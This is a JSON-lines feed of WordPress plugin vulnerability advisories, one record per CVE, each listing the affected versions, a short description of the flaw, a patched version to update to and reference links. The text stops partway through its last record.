{"CVE_ID":"CVE-2024-9501","slug":"wp-social","versionImpact":"3.0.7","versionEndExcluding":"3.0.8","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 3.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.6\\\/inc\\\/admin-create-user.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.6\\\/inc\\\/admin-create-user.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11219","slug":"otter-blocks","versionImpact":"3.0.6","versionEndExcluding":"3.0.7","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 3.0.6 via the get_image function. This makes it possible for unauthenticated attackers to view arbitrary images on the server, which can contain sensitive information.","recommendation":"Update to version 3.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otter-blocks\\\/tags\\\/3.0.6\\\/inc\\\/plugins\\\/class-dynamic-content.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otter-blocks\\\/tags\\\/3.0.6\\\/inc\\\/plugins\\\/class-dynamic-content.php#L222\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e9ab63-d61e-40f1-a5cb-432f33dfd2a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e9ab63-d61e-40f1-a5cb-432f33dfd2a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35090","slug":"masterstudy-lms-learning-management-system","versionEndExcluding":"3.0.7","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin <= 3.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3745","slug":"wp-lightbox-2","versionImpact":"3.0.6.7","versionEndExcluding":"3.0.6.8","description":"The WP Lightbox 2 WordPress plugin before 3.0.6.8 does not correctly sanitize the value of the title attribute of links before using them, which may allow malicious users to conduct XSS attacks.","recommendation":"Update to version 3.0.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b50f686-c2e0-4963-95c8-b27137dcc059\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b50f686-c2e0-4963-95c8-b27137dcc059\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6263","slug":"wp-lightbox-2","versionImpact":"3.0.6.6","versionEndExcluding":"3.0.6.7","description":"The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 3.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe275351-a547-440d-9e8c-c464ed333aa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe275351-a547-440d-9e8c-c464ed333aa9?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-lightbox-2\\\/trunk\\\/wp-lightbox-2.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-lightbox-2\\\/trunk\\\/wp-lightbox-2.js\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3108386%40wp-lightbox-2&old=3046989%40wp-lightbox-2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3108386%40wp-lightbox-2&old=3046989%40wp-lightbox-2\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-8544","slug":"facebook-conversion-pixel","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Pixel Cat \u2013 Conversion Pixel Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4f4a78-7224-4f58-a103-7ad4df0eb36e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4f4a78-7224-4f58-a103-7ad4df0eb36e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151635%40facebook-conversion-pixel&new=3151635%40facebook-conversion-pixel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151635%40facebook-conversion-pixel&new=3151635%40facebook-conversion-pixel&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-conversion-pixel\\\/trunk\\\/includes\\\/notices\\\/notices.php?rev=2918763#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-conversion-pixel\\\/trunk\\\/includes\\\/notices\\\/notices.php?rev=2918763#L81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5222","slug":"responsive-add-ons","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Responsive Addons \u2013 Starter Templates, Advanced Features and Customizer Settings for Responsive Theme. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploader in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1af37ed-fcc6-479c-8c53-25ccb9a8659f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1af37ed-fcc6-479c-8c53-25ccb9a8659f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/class-responsive-add-ons.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/class-responsive-add-ons.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-add-ons\\\/tags\\\/3.0.4\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094256\\\/responsive-add-ons\\\/trunk\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094256\\\/responsive-add-ons\\\/trunk\\\/includes\\\/importers\\\/wxr-importer\\\/class-responsive-ready-sites-wxr-importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2042","slug":"elementskit-lite","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.4\\\/widgets\\\/image-accordion\\\/image-accordion.php#L962\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.4\\\/widgets\\\/image-accordion\\\/image-accordion.php#L962\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3992","slug":"ultimate-post","versionEndExcluding":"3.0.6","description":"The PostX WordPress plugin before 3.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c43b669f-0377-4402-833c-817b75001888\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c43b669f-0377-4402-833c-817b75001888\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4186","slug":"edwiser-bridge","versionImpact":"3.0.5","versionEndExcluding":"3.0.6","description":"The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.0.5. This is due to the 'eb_user_email_verification_key' default value is empty, and the not empty check is missing in the 'eb_user_email_verify' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. This can only be exploited if the 'Email Verification' setting is enabled.","recommendation":"Update to version 3.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6969d281-f280-4714-9859-38ac66e9cc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6969d281-f280-4714-9859-38ac66e9cc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/edwiser-bridge\\\/tags\\\/3.0.4\\\/includes\\\/class-eb-user-manager.php#L1571\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/edwiser-bridge\\\/tags\\\/3.0.4\\\/includes\\\/class-eb-user-manager.php#L1571\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081961\\\/edwiser-bridge#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081961\\\/edwiser-bridge#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13898","slug":"simple-banner","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Simple Banner \u2013 Easily add multiple Banners\/Bars\/Notifications\/Announcements to the top or bottom of your website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3264130%40simple-banner%2Ftrunk&old=3210193%40simple-banner%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3264130%40simple-banner%2Ftrunk&old=3210193%40simple-banner%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a2dea28-14cf-4e83-ac72-efc7c97ecf54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a2dea28-14cf-4e83-ac72-efc7c97ecf54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5470","slug":"etsy-shop","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Etsy Shop plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'etsy-shop' shortcode in versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4696f7a-8b87-4376-b4c9-596eca30b38c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4696f7a-8b87-4376-b4c9-596eca30b38c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977260\\\/etsy-shop#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977260\\\/etsy-shop#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L94\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/etsy-shop\\\/tags\\\/3.0.4\\\/etsy-shop.php#L417\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1239","slug":"elementskit-lite","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blog post read more button in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1822fd58-0dba-4b15-9702-32e3aa4405b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042291%40elementskit-lite&new=3042291%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3650","slug":"bubble-menu","versionEndExcluding":"3.0.5","description":"The Bubble Menu WordPress plugin before 3.0.5 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0ecdff-c961-4947-bf7e-bd2392501e33\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a0ecdff-c961-4947-bf7e-bd2392501e33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12739","slug":"mobile-contact-bar","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Mobile Contact Bar WordPress plugin before 3.0.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5492f1b2-481b-472a-82d3-949f85c8dc70\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5492f1b2-481b-472a-82d3-949f85c8dc70\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9828","slug":"taskbuilder","versionImpact":"3.0.4","versionEndExcluding":"3.0.5","description":"The Taskbuilder  WordPress plugin before 3.0.5 does not sanitize user input into the 'load_orders' parameter and uses it in a SQL statement, allowing high privilege users such as admin to perform SQL Injection attacks","recommendation":"Update to version 3.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb2d0932-fd47-4aef-9d08-4377c742bb6e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb2d0932-fd47-4aef-9d08-4377c742bb6e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5228","slug":"user-registration","versionImpact":"3.0.4.1","versionEndExcluding":"3.0.4.2","description":"The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50ae7008-46f0-4f89-ae98-65dcabe4ef09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50ae7008-46f0-4f89-ae98-65dcabe4ef09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10471","slug":"everest-forms","versionImpact":"3.0.4.1","versionEndExcluding":"3.0.4.2","description":"The Everest Forms  WordPress plugin before 3.0.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d590c9-c96d-40c9-aa59-48302ba3d63c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d590c9-c96d-40c9-aa59-48302ba3d63c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22676","slug":"upcasted-s3-offload","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in upcasted AWS S3 for WordPress Plugin \u2013 Upcasted allows Stored XSS. This issue affects AWS S3 for WordPress Plugin \u2013 Upcasted: from n\/a through 3.0.3.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upcasted-s3-offload\\\/vulnerability\\\/wordpress-upcasted-s3-offload-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/upcasted-s3-offload\\\/vulnerability\\\/wordpress-upcasted-s3-offload-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4502","slug":"gtranslate","versionEndExcluding":"3.0.4","description":"The Translate WordPress with GTranslate WordPress plugin before 3.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). This vulnerability affects multiple parameters.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4804850-2ac2-4cec-bc27-07ed191d96da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e4804850-2ac2-4cec-bc27-07ed191d96da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12527","slug":"perfect-portal-widgets","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The Perfect Portal Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'perfect_portal_intake_form' shortcode in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/perfect-portal-widgets\\\/tags\\\/3.0.3\\\/perfect-portal-widgets.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/perfect-portal-widgets\\\/tags\\\/3.0.3\\\/perfect-portal-widgets.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bded6765-e994-46a4-8c88-c324a4fd6ee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bded6765-e994-46a4-8c88-c324a4fd6ee6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"bubble-menu","versionEndExcluding":"3.0.4","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6525","slug":"elementskit-lite","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the progress bar element attributes in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This primarily affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e724394d-97aa-42e4-b36e-6e49bfefa2f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e724394d-97aa-42e4-b36e-6e49bfefa2f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/progressbar\\\/progressbar.php#L535\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.0.3\\\/widgets\\\/progressbar\\\/progressbar.php#L535\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/widgets\\\/progressbar\\\/progressbar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3011323\\\/elementskit-lite\\\/trunk\\\/widgets\\\/progressbar\\\/progressbar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12769","slug":"simple-banner","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The Simple Banner  WordPress plugin before 3.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02b5c1a8-cf2a-4378-bfda-84d841d88a18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02b5c1a8-cf2a-4378-bfda-84d841d88a18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36849","slug":"ait-csv-import-export","versionImpact":"3.0.3","versionEndExcluding":"3.0.4","description":"The AIT CSV import\/export plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the \/wp-content\/plugins\/ait-csv-import-export\/admin\/upload-handler.php file in versions up to, and including, 3.0.3. This makes it possible for unauthorized attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 3.0.4, or a newer patched 